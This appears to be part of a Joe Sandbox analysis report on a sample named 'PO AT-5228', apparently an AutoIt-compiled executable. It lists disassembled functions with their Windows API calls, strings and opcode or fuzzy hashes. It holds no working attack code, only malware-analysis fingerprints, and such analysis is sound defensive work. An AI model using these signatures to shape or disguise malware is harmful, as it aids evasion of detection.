                                                                                        • Opcode Fuzzy Hash: a67bec1370ecf4aa981dc6ca88e8d94a22a380f260fe5df8234d86d0af66ebbc
                                                                                        • Instruction Fuzzy Hash: AC316A71110604AEEB109F68CC85FBB73E9FF59760F00865DF9A9D7190DA31AC81D760
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA51C6
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BA5201
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: eba35198a61a988ced39cf707369d945eee58685bf29ef97fb3009b0432d5cc7
                                                                                        • Instruction ID: 5301bbdf81168545c6bdb0ec315b99e5a3299112632a3c99999435a3ae6e1667
                                                                                        • Opcode Fuzzy Hash: eba35198a61a988ced39cf707369d945eee58685bf29ef97fb3009b0432d5cc7
                                                                                        • Instruction Fuzzy Hash: E031E471608705EFEB34CF99D885BAEBBF4EF86350F1440A9E985A61A0D7749B44CB10
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __snwprintf
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                        • API String ID: 2391506597-2584243854
                                                                                        • Opcode ID: ed59a3f0f2866bca20363a93606a78109e03c77d03ba9a5741fa2a6b74227ed4
                                                                                        • Instruction ID: 1f4bd8c21acc0f972a280cd8739daa15dacab767a539ebe6d04727e53115ee30
                                                                                        • Opcode Fuzzy Hash: ed59a3f0f2866bca20363a93606a78109e03c77d03ba9a5741fa2a6b74227ed4
                                                                                        • Instruction Fuzzy Hash: 27215E71600219ABCF24EF64C882AFD77F4AF46744F0004A9F505AB152DBB8EE55DBA1
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BC945C
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BC9467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        • Opcode ID: 1672867058b439c58959f9b28ba2563f235a646f37293f8b31e55849bdb1f008
                                                                                        • Instruction ID: cf1abf8c82ffaaa69c05a0f3166fde518574ee3a4127e2d7b0738e6439edbba4
                                                                                        • Opcode Fuzzy Hash: 1672867058b439c58959f9b28ba2563f235a646f37293f8b31e55849bdb1f008
                                                                                        • Instruction Fuzzy Hash: 71119DB1210208AFFF259E54DC84FAB37AAEB883A4F104169F9189B2A0D6719C528760
                                                                                        APIs
                                                                                          • Part of subcall function 00B7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                                                          • Part of subcall function 00B7D17C: GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                                                          • Part of subcall function 00B7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00BC9968
                                                                                        • GetSysColor.USER32(00000012), ref: 00BC9982
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: bac14e138473468e0e8f8671197097a7db0561252e2d6780afd579407e5dd6ea
                                                                                        • Instruction ID: 288971fd73bf1d9f7cd23400b71f4a76ece510bec9676fe402a88fe7f9e0afc9
                                                                                        • Opcode Fuzzy Hash: bac14e138473468e0e8f8671197097a7db0561252e2d6780afd579407e5dd6ea
                                                                                        • Instruction Fuzzy Hash: E5114772520209AFDB04DFB8C849EEA7BE8EB08354F05462CF955E3150D674E850DB60
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00BC9699
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BC96A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: edit
                                                                                        • API String ID: 2978978980-2167791130
                                                                                        • Opcode ID: 9c61339123618332d9f1c2fef007ac71b420172e8760a8991409b3a937fb7b28
                                                                                        • Instruction ID: 1cde8aad448a40141391778449cd7763763cf8f9d2e29d107cded5d704173612
                                                                                        • Opcode Fuzzy Hash: 9c61339123618332d9f1c2fef007ac71b420172e8760a8991409b3a937fb7b28
                                                                                        • Instruction Fuzzy Hash: 80116A71500108ABFB119FA4DC88FEB3BAAEB153B8F504368FA65971E0C771DC519760
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA52D5
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00BA52F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 5fbcbd06aa4209014500410cedf6d83d4086b480557ceac00b48e95a9ac5fb4c
                                                                                        • Instruction ID: 17d4dbfb6293da296ea1324bcfe2023186570b8151e830c5bd9952052b82757f
                                                                                        • Opcode Fuzzy Hash: 5fbcbd06aa4209014500410cedf6d83d4086b480557ceac00b48e95a9ac5fb4c
                                                                                        • Instruction Fuzzy Hash: FD11D072905714BBDF30DA98D944B9D77E8EB86790F0900A5E942E72A0D7B0EF05CBA0
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BB4DF5
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BB4E1E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        • Opcode ID: 9e4127fcae1f3d6c1e3fdad91e9d0f21a02ddff5df318e0b18676127691561f6
                                                                                        • Instruction ID: dfe4654b7c25e336420f9dff74a87f2f7adc9c0c45e674336d7eeb93e90d6ac2
                                                                                        • Opcode Fuzzy Hash: 9e4127fcae1f3d6c1e3fdad91e9d0f21a02ddff5df318e0b18676127691561f6
                                                                                        • Instruction Fuzzy Hash: 8711AC70501221BBDB298F61C8C9EFBFAE8FF06755F10826AF51596141D7F09D80C6E0
                                                                                        APIs
                                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00BBA84E
                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00BBA88B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: htonsinet_addr
                                                                                        • String ID: 255.255.255.255
                                                                                        • API String ID: 3832099526-2422070025
                                                                                        • Opcode ID: 84e2483de7a955b42a8ca150a3f5600d3375134d0abbb9e7a019bda08ebea9fa
                                                                                        • Instruction ID: 3ba306fe85e99531d56c7c227b273aae317613ad9e87900ee37902cde88f184e
                                                                                        • Opcode Fuzzy Hash: 84e2483de7a955b42a8ca150a3f5600d3375134d0abbb9e7a019bda08ebea9fa
                                                                                        • Instruction Fuzzy Hash: 7B01C075600304ABCB11AF68CCC6BF9B7A4EF45314F1085AAE5169B6D1DAB1E8058752
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B9B7EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: 38489ed8a7a8391627ded5fc9c601b153e964feaf225fd82649dc8645c2e2c6f
                                                                                        • Instruction ID: 517660ffdd232253d491e49b842490d68bbde649194b1e9a4fbe6ca38c8f64bb
                                                                                        • Opcode Fuzzy Hash: 38489ed8a7a8391627ded5fc9c601b153e964feaf225fd82649dc8645c2e2c6f
                                                                                        • Instruction Fuzzy Hash: 0701F171600118ABCF04EBA4DC82DFE33E9AF06310B04066CF4A2672D2EB7868189790
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B9B6EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: efda0cfc4e80c3220091d4c7aed1ff1b46b480f6c05d81bf5803db04fe85abbb
                                                                                        • Instruction ID: 93bcbc4db79e5ca1e5673c03dc79e973d3dc30ed6bdbe943c8ccb01e4340dfcc
                                                                                        • Opcode Fuzzy Hash: efda0cfc4e80c3220091d4c7aed1ff1b46b480f6c05d81bf5803db04fe85abbb
                                                                                        • Instruction Fuzzy Hash: F701A275641008ABCF04EBA4DA52EFE77F89F15340F1400B9B442B3181DB986E1897B5
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B9B76C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: 587f4a7d6fe8a258408f60b931070840d1e800b90e9459ca3b54bde0d6aff627
                                                                                        • Instruction ID: 6f8b97f5a2f61a3f1bd03ca64922bd902c43960c1aa3cc820a4bf2bed04cbbc6
                                                                                        • Opcode Fuzzy Hash: 587f4a7d6fe8a258408f60b931070840d1e800b90e9459ca3b54bde0d6aff627
                                                                                        • Instruction Fuzzy Hash: A301D1B5640108ABCF00EBA4DA82EFE73EC9F15340F140179B442B3192DBA95E1997B5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        • Opcode ID: 4f9004fd9b4c1d7bd62ebd058e50f07b5021f520f7dfbc905437c5def51e2d4c
                                                                                        • Instruction ID: 5217cda785111e43cb09dc78ffb846b5d64afcad5ad12c9bfa720f711949af88
                                                                                        • Opcode Fuzzy Hash: 4f9004fd9b4c1d7bd62ebd058e50f07b5021f520f7dfbc905437c5def51e2d4c
                                                                                        • Instruction Fuzzy Hash: 15E092776043642BDB20EAA99C49FCBFBACEB52764F0000A6B915D3051DA74AA4287D0
                                                                                        APIs
                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B9A63F
                                                                                          • Part of subcall function 00B813F1: _doexit.LIBCMT ref: 00B813FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message_doexit
                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                        • API String ID: 1993061046-4017498283
                                                                                        • Opcode ID: 1148a3259b6c6c520ffbc1b4d65e3eea24376a6b839638dc4477af13dc7eb610
                                                                                        • Instruction ID: 5f61926cc57e8024fadc6114c774ecb927c45de8d58dcbabb9d0f5643ea9aee7
                                                                                        • Opcode Fuzzy Hash: 1148a3259b6c6c520ffbc1b4d65e3eea24376a6b839638dc4477af13dc7eb610
                                                                                        • Instruction Fuzzy Hash: 76D02B313C031833C31036AC6C0BFD836CC8B15F51F0440A5BB0C9A1D24DD2C69042DD
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00BDACC0
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00BDAEBD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                        • String ID: WIN_XPe
                                                                                        • API String ID: 510247158-3257408948
                                                                                        • Opcode ID: 8003d159634095a7e39d6806a989473f5cf400ef434988646dbd7d6316a912fa
                                                                                        • Instruction ID: 9d9c71fbf56343e67d985e1f5d5fb7dc798a7ace2318c6b6edd0a08977ea6f2b
                                                                                        • Opcode Fuzzy Hash: 8003d159634095a7e39d6806a989473f5cf400ef434988646dbd7d6316a912fa
                                                                                        • Instruction Fuzzy Hash: 5EE0C975C24549AFDB11DBA5DD84AECF7F8EB48301F1880C6E116B6660EB705A84DF22
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BC86A2
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BC86B5
                                                                                          • Part of subcall function 00BA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: b7abcbaf789e121edd1c2a8ad1b89c43c3230e92b578edc699cee9575e468e7d
                                                                                        • Instruction ID: 8ebc469d474ec23765bed53a3423ede9698e5718543d1975c5fca4e158ae127e
                                                                                        • Opcode Fuzzy Hash: b7abcbaf789e121edd1c2a8ad1b89c43c3230e92b578edc699cee9575e468e7d
                                                                                        • Instruction Fuzzy Hash: 5CD0123138C394BBE6646770DC4BFC67A589B15B11F110925B749AF1D0CDF4E940CB54
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BC86E2
                                                                                        • PostMessageW.USER32(00000000), ref: 00BC86E9
                                                                                          • Part of subcall function 00BA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: 53657d4d2a71802ebc17b5989eb34ea28b246881dfe2aeafc027bab6756e174c
                                                                                        • Instruction ID: 430ca343a8c3a5a1fc8bf518b31ee07475c5f6326f4cda52c306d59069de84cd
                                                                                        • Opcode Fuzzy Hash: 53657d4d2a71802ebc17b5989eb34ea28b246881dfe2aeafc027bab6756e174c
                                                                                        • Instruction Fuzzy Hash: 29D0A9313883947BE22463309C4BFC66A489B05B10F000824B205AE0C0CCE0A9408B14